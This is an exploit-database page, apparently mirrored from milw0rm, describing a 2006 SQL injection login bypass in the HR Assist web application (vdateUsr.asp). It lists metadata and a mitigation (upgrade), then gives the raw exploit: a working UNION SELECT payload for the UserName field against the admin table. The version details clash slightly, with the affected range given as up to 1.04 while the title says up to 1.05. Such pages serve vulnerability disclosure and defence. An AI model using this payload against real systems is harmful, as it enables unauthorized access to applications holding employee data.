header-logo
Suggest Exploit
vendor:
HR Assist
by:
ajann
9,3
CVSS
HIGH
Remote Login ByPass SQL Injection
89
CWE
Product Name: HR Assist
Affected Version From: 1.0
Affected Version To: 1.04
Patch Exists: YES
Related CWE: N/A
CPE: a:ezhrs:hr_assist
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

HR Assist <= 1.05 (vdateUsr.asp) Remote Login ByPass SQL Injection

HR Assist is prone to a remote login bypass vulnerability because the application fails to sufficiently sanitize user-supplied data. An attacker can exploit this issue to gain access to the application without valid credentials.

Mitigation:

Upgrade to version 1.05 or later.
Source

Exploit-DB raw data:

*******************************************************************************
# Title   :  HR Assist <= 1.05 (vdateUsr.asp) Remote Login ByPass SQL Injection
# Author  :  ajann
# Page    :  http://www.ezhrs.com
# Contact :   :(
# $$$     :  $45

*******************************************************************************
Example:

###http://[target]/[path]/

UserName: ' union select 0,0,0,0,0,0,0,0,0,0,0,0,0 from admin


"""""""""""""""""""""
# ajann,Turkey
# ...

# Im not Hacker!

# milw0rm.com [2006-12-09]

Navigation

Suggest Exploit

Services By CQR